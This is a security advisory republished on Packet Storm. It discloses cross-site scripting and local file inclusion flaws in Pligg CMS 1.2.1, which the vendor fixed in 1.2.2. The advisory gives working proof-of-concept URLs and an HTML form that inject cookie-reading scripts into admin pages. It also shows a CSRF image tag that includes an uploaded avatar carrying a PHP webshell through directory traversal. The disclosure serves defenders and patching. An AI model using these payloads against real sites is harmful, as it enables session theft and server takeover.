exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pligg CMS 1.2.1 Cross Site Scripting / Local File Inclusion

Pligg CMS 1.2.1 Cross Site Scripting / Local File Inclusion
Posted May 25, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

Pligg CMS version 1.2.1 suffers from cross site scripting and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
advisories | CVE-2012-2435, CVE-2012-2436
SHA-256 | a7d8c229d604afce14ad7a8fb8d44e7b7cc72c937a69259550169bc098531f63

Pligg CMS 1.2.1 Cross Site Scripting / Local File Inclusion

Change Mirror Download
Advisory ID: HTB23089
Product: Pligg CMS
Vendor: Pligg, LLC.
Vulnerable Version(s): 1.2.1 and probably prior
Tested Version: 1.2.1
Vendor Notification: 25 April 2012
Vendor Patch: 18 May 2012
Public Disclosure: 23 May 2012
Vulnerability Type: Local File Inclusion, Cross-Site Scripting (XSS)
CVE References: CVE-2012-2435, CVE-2012-2436
Solution Status: Fixed by Vendor
Risk Level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pligg CMS , which can be exploited to perform Cross-Site Scripting (XSS) and Local File Inclusion attacks.


1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436

1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:


<form action="http://[host]/module.php?module=karma" method="post" name="main" id="main">
<input type="hidden" name="karma_value" value="1">
<input type="hidden" name="karma_username" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" id="btn" value="submit">
</form>


1.3 Input passed via the "q_1_low". "q_1_high", "q_2_low", "q_2_high" GET parameters to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.4 Input passed via the "edit" GET parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/module.php?module=admin_language&mode=edit&edit=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


2) Local File Inclusion in Pligg CMS: CVE-2012-2435

2.1 Input passed via the "captcha" GET parameter to module.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary or previously uploaded local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes, however successful exploitation of this vulnerability requires administrative privileges. Therefore the most appropriate vector of exploitation is CSRF.

The attacker should register in the system, upload a ".jpg" avatar with malicious content (e.g. PHP webshell upload) and make logged-in administrator visiting specially crafted web page that will exploit Local File Inclusion via CSRF. For example this PoC (Proof of Concept):

<img src="http://[host]/module.php?module=captcha&action=configure&captcha=../../../avatars/user_uploaded/[USER_ID]_original.jpg%00">

Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is off.

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Pligg CMS 1.2.2

More Information: http://forums.pligg.com/downloads.php?do=file&id=15

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple vulnerabilities in Pligg CMS.
[2] Pligg CMS - http://pligg.com - Pligg is an open source CMS (Content Management System) that you can download and use for free.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close